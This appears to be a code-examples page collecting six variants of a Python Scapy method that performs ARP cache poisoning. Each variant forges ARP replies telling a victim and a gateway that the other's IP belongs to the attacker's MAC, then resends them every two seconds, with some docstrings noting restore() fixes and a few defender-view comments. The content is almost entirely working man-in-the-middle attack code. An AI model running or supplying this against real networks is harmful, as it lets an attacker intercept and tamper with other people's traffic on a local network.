Esempio n. 1
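    def poison(self):
        """Send forged ARP replies to the victim and the gateway for 45 seconds.

        Two ARP replies are prepared: one addressed to the victim that claims
        the gateway's IP, one addressed to the gateway that claims the
        victim's IP. Both are re-sent every 2 seconds until the 45-second
        window closes, after which ``self.restore()`` (defined elsewhere in
        the class) is called.

        ``self.restore()`` runs in a ``finally`` clause, so it is also called
        when the loop is interrupted (for example by Ctrl-C). The exception
        itself still propagates to the caller.
        """
        # 1) Build the reply aimed at the victim. Nothing is sent until step 3.
        # ARP is a packet class (Scapy, imported outside this snippet);
        # calling it creates a packet object whose fields are filled in below.
        poison_victim = ARP()
        poison_victim.op = 2  # 2 = "is-at" (reply); 1 = "who-has" (request)
        # Field prefixes follow the ARP header: 'p' = protocol (IP) address,
        # 'hw' = hardware (MAC) address. The claimed sender IP is the
        # gateway's, not this machine's.
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.victimmac
        print(
            f'ip src: {poison_victim.psrc} (ie the gateway - not my machine!')
        print(f'ip dst: {poison_victim.pdst}')
        print(f'mac dst: {poison_victim.hwdst}')
        # hwsrc is never assigned here: Scapy supplies the MAC of the local
        # sending interface as the default, so the reply pairs the gateway's
        # IP with this host's MAC.
        print(f'mac src: {poison_victim.hwsrc}')
        print(poison_victim.summary())
        print('-' * 30)

        # 2) Build the mirror-image reply aimed at the gateway.
        poison_gateway = ARP()
        poison_gateway.op = 2  # "is-at" reply, as above
        # The claimed sender IP is the victim's.
        poison_gateway.psrc = self.victim
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac
        print(f'ip src: {poison_gateway.psrc}')
        print(f'ip dst: {poison_gateway.pdst}')
        print(f'mac dst: {poison_gateway.hwdst}')
        print(f'mac_src: {poison_gateway.hwsrc}')
        print(poison_gateway.summary())
        print('-' * 30)

        # 3) Send both replies every 2 seconds for a fixed 45-second window.
        print(
            f'Beginning the ARP poison (ie sending the packets).Ffor 45 seconds.'
        )
        t_end = time.time() + 45  # 45 seconds
        try:
            while time.time() < t_end:
                # Timestamp per round so the progress is visible on the terminal.
                sys.stdout.write(str(time.strftime("%H:%M:%S")) + "~")
                sys.stdout.flush()
                send(poison_victim)
                send(poison_gateway)
                time.sleep(2)
        finally:
            # 4) Always hand control to restore(), whether the window expired
            # or the loop was interrupted, so both hosts are not left with
            # the forged entries once this method stops refreshing them.
            self.restore()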
Esempio n. 2
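 def poison(self):
     """Send forged ARP replies to victim and gateway until interrupted.

     Builds one ARP reply per direction (gateway IP announced to the victim,
     victim IP announced to the gateway), prints their fields, then re-sends
     both every 2 seconds. On Ctrl-C, ``self.restore()`` (defined elsewhere
     in the class) is called and the process exits via ``sys.exit()``.

     The whole loop sits inside the ``try`` so that an interrupt arriving
     during ``time.sleep`` is handled the same way as one arriving during
     ``send``. With the sleep in an ``else`` clause it was outside the
     handler and ``restore()`` was skipped.
     """
     # Reply addressed to the victim, claiming the gateway's IP.
     poison_victim = ARP()
     poison_victim.op = 2  # 2 = "is-at" (ARP reply)
     poison_victim.psrc = self.gateway
     poison_victim.pdst = self.victim
     poison_victim.hwdst = self.victimmac
     print(f'ip src: {poison_victim.psrc}')
     print(f'ip dst: {poison_victim.pdst}')
     print(f'mac dst: {poison_victim.hwdst}')
     # hwsrc is left at its default; it is only read here for display.
     print(f'mac src: {poison_victim.hwsrc}')
     print('-' * 30)

     # Reply addressed to the gateway, claiming the victim's IP.
     poison_gateway = ARP()
     poison_gateway.op = 2
     poison_gateway.psrc = self.victim
     poison_gateway.pdst = self.gateway
     poison_gateway.hwdst = self.gatewaymac
     print(f'ip src: {poison_gateway.psrc}')
     print(f'ip dst: {poison_gateway.pdst}')
     print(f'mac dst: {poison_gateway.hwdst}')
     print(f'mac src: {poison_gateway.hwsrc}')
     print(poison_gateway.summary())
     print('-' * 30)

     print('Beginning the ARP posion. [Ctrl-c to stop]')
     try:
         while True:
             # One dot per round as a progress indicator.
             sys.stdout.write('.')
             sys.stdout.flush()
             send(poison_victim)
             send(poison_gateway)
             time.sleep(2)
     except KeyboardInterrupt:
         # Covers the send calls and the sleep alike.
         self.restore()
         sys.exit()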
Esempio n. 3
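    def poison(self):
        '''Create poisoned packets and send them to the victim and the gateway.

        Each packet is an ARP reply (op 2). The one for the victim carries the
        gateway's IP as sender, the one for the gateway carries the victim's
        IP as sender. Neither sets ``hwsrc``, which the print labels below
        identify as the attacker's MAC. The pair is re-sent every 2 seconds
        until Ctrl-C, at which point ``self.restore()`` is called and the
        process exits.

        The interrupt handler wraps the whole loop, sleep included. With the
        sleep in an ``else`` clause, an interrupt during the 2-second pause
        was not caught and the restore step was skipped.
        '''
        poison_victim = ARP()
        poison_victim.op = 2  # ARP Reply
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.victimmac
        print(f'Gateway,  IP source:        {poison_victim.psrc}'
              )  # Gateway's IP address
        print(f'Victim,   IP destiantion:   {poison_victim.pdst}')
        print(f'ATTACKER, MAC source:       {poison_victim.hwsrc}'
              )  # Attacker's MAC address
        print(f'Victim,   MAC destination:  {poison_victim.hwdst}')
        print(poison_victim.summary())
        print('~*~' * 15)

        poison_gateway = ARP()
        poison_gateway.op = 2  # ARP Reply
        poison_gateway.psrc = self.victim
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac
        print(f'Victim,   IP source: {poison_gateway.psrc}'
              )  # Victim's IP address
        print(f'Gateway,  IP destiantion: {poison_gateway.pdst}')
        print(f'ATTACKER, MAC source: {poison_gateway.hwsrc}'
              )  # Attacker's MAC address
        print(f'Gateway,  MAC destination: {poison_gateway.hwdst}')
        print(poison_gateway.summary())
        print('><(((º> ' * 15)

        print('Begin the ARP poison. [CTRL-C to stop]')
        # The replies are repeated so the forged cache entries stay in place.
        # Defender's view: a steady stream of unsolicited replies remapping
        # the gateway IP to a different MAC is the pattern that ARP
        # monitoring and Dynamic ARP Inspection are built to flag.
        try:
            while True:
                # Progress indicator: one dot per round, flushed right away so
                # it appears on the terminal without waiting for a newline.
                sys.stdout.write('.')
                sys.stdout.flush()
                # The sending host is expected to have IP forwarding enabled.
                send(poison_victim)
                send(poison_gateway)
                time.sleep(2)
        except KeyboardInterrupt:
            # Restore ARP cache entries, then stop.
            self.restore()
            sys.exit()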
Esempio n. 4
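    def poison(self):
        """
        Simple ARP poisoner.

        - Builds an ARP reply for the victim whose sender IP is the gateway's
          address.
        - Builds an ARP reply for the gateway whose sender IP is the victim's
          address.
        - Neither packet sets ``hwsrc``, so the sender MAC is whatever the
          packet library supplies by default (the attacker's MAC).
        - Sends both packets, waits 2 seconds, and repeats.

        [!] This loops until the user cancels. [!]
        [*] To stop the loop press CTRL-C: ``self.restore()`` is then called
            and the process exits. [*]

        The interrupt handler covers the 2-second sleep as well as the sends.
        With the sleep in an ``else`` clause, CTRL-C during the pause left the
        method without calling ``self.restore()``.
        """
        # Keyword construction sets the same four fields as attribute
        # assignment; op=2 is an ARP reply ("is-at").
        poison_victim = ARP(
            op=2,
            psrc=self.gateway,
            pdst=self.victim,
            hwdst=self.victim_mac,
        )
        print(f'IP src: {poison_victim.psrc}')
        print(f'IP dst: {poison_victim.pdst}')
        print(f'MAC dst: {poison_victim.hwdst}')
        print(f'MAC src: {poison_victim.hwsrc}')
        print(poison_victim.summary())
        print('-'*30)

        poison_gateway = ARP(
            op=2,
            psrc=self.victim,
            pdst=self.gateway,
            hwdst=self.gateway_mac,
        )
        print(poison_gateway.summary())
        print('-'*30)

        print('Beginning the ARP poison. [CTRL-C to stop]')
        try:
            while True:
                sys.stdout.write('.')  # one dot per round
                sys.stdout.flush()
                send(poison_victim)
                send(poison_gateway)
                time.sleep(2)
        except KeyboardInterrupt:
            # Reached from the sends and from the sleep alike.
            self.restore()
            sys.exit()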
Esempio n. 5
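    def poison(self):
        """Repeatedly send forged ARP replies to the victim and the gateway.

        The victim-bound reply announces ``self.gateway_ip`` as its sender
        IP, and the gateway-bound reply announces ``self.victim_ip``. Both
        leave ``hwsrc`` at the library default. The fields and a one-line
        summary of each packet are printed first, then the pair is sent every
        2 seconds until Ctrl-C.

        On Ctrl-C, ``self.restore()`` (defined elsewhere in the class) is
        called and the process exits through ``sys.exit()``. The handler
        encloses the sleep too. With the sleep in an ``else`` clause, an
        interrupt during the pause skipped ``restore()``.
        """
        # op=2 marks the packet as an ARP reply ("is-at").
        poison_victim = ARP(
            op=2,
            psrc=self.gateway_ip,
            pdst=self.victim_ip,
            hwdst=self.victim_mac,
        )
        print(f'IP source: {poison_victim.psrc}')
        print(f'MAC source: {poison_victim.hwsrc}')
        print(f'IP destination: {poison_victim.pdst}')
        print(f'MAC destination: {poison_victim.hwdst}')
        print(poison_victim.summary())
        print('-' * 30)

        poison_gateway = ARP(
            op=2,
            psrc=self.victim_ip,
            pdst=self.gateway_ip,
            hwdst=self.gateway_mac,
        )
        print(f'IP source: {poison_gateway.psrc}')
        print(f'MAC source: {poison_gateway.hwsrc}')
        print(f'IP destination: {poison_gateway.pdst}')
        print(f'MAC destination: {poison_gateway.hwdst}')
        print(poison_gateway.summary())
        print('-' * 30)
        print('Beginning the ARP poison. [CTRL-C to stop]')

        # Defender's view: the same IP-to-MAC claim repeated every 2 seconds
        # without a matching request is what ARP monitoring and Dynamic ARP
        # Inspection look for.
        try:
            while True:
                sys.stdout.write('.')  # progress dot, flushed immediately
                sys.stdout.flush()
                send(poison_victim)
                send(poison_gateway)
                time.sleep(2)
        except KeyboardInterrupt:
            self.restore()
            sys.exit()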
Esempio n. 6
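    def poison(self):
        """Send forged ARP replies to the target and the gateway until a deadline.

        One reply announces the gateway's IP to the target, the other
        announces the target's IP to the gateway. Both leave ``hwsrc`` at the
        library default. The pair is sent every 2 seconds while
        ``time.time() < TIME_LIMIT``. ``TIME_LIMIT`` is a module-level name
        not shown in this snippet, and the comparison implies it is an
        absolute epoch timestamp.

        On Ctrl-C, ``self.restore()`` is called and the process exits.

        Fixes relative to the earlier version:
        - the field dumps call ``print``. ``printf`` is not a Python builtin
          and is not defined in this snippet, so the method would have raised
          ``NameError`` unless the name is defined elsewhere in the file;
        - the destination IP is read from ``pdst``, the field assigned a few
          lines earlier, instead of ``dst``;
        - the interrupt handler also covers ``time.sleep``, so Ctrl-C during
          the pause no longer skips ``self.restore()``.
        """
        poison_target = ARP()
        poison_target.op = 2  # 2 = "is-at" (ARP reply)
        poison_target.psrc = self.gateway
        poison_target.pdst = self.target
        poison_target.hwdst = self.target_mac

        print(f'IP Src: {poison_target.psrc}')
        print(f'IP Dst: {poison_target.pdst}')
        print(f'MAC Dst: {poison_target.hwdst}')
        print(f'MAC Src: {poison_target.hwsrc}')
        print(poison_target.summary())
        print('-' * 30)

        poison_gateway = ARP()
        poison_gateway.op = 2
        poison_gateway.psrc = self.target
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gateway_mac
        print(f'IP Src: {poison_gateway.psrc}')
        print(f'IP Dst: {poison_gateway.pdst}')
        print(f'MAC Dst: {poison_gateway.hwdst}')
        print(f'MAC Src: {poison_gateway.hwsrc}')
        print(poison_gateway.summary())
        print('-' * 30)
        print('Beginning ARP Poison. [Press Ctrl-C to stop]')
        try:
            while time.time() < TIME_LIMIT:
                sys.stdout.write('.')  # one dot per round
                sys.stdout.flush()
                send(poison_target)
                send(poison_gateway)
                time.sleep(2)
        except KeyboardInterrupt:
            self.restore()
            sys.exit()
        # NOTE(review): when the deadline passes the method returns without
        # calling self.restore(). Confirm that the caller does so; otherwise
        # both hosts keep the forged entries until their caches expire.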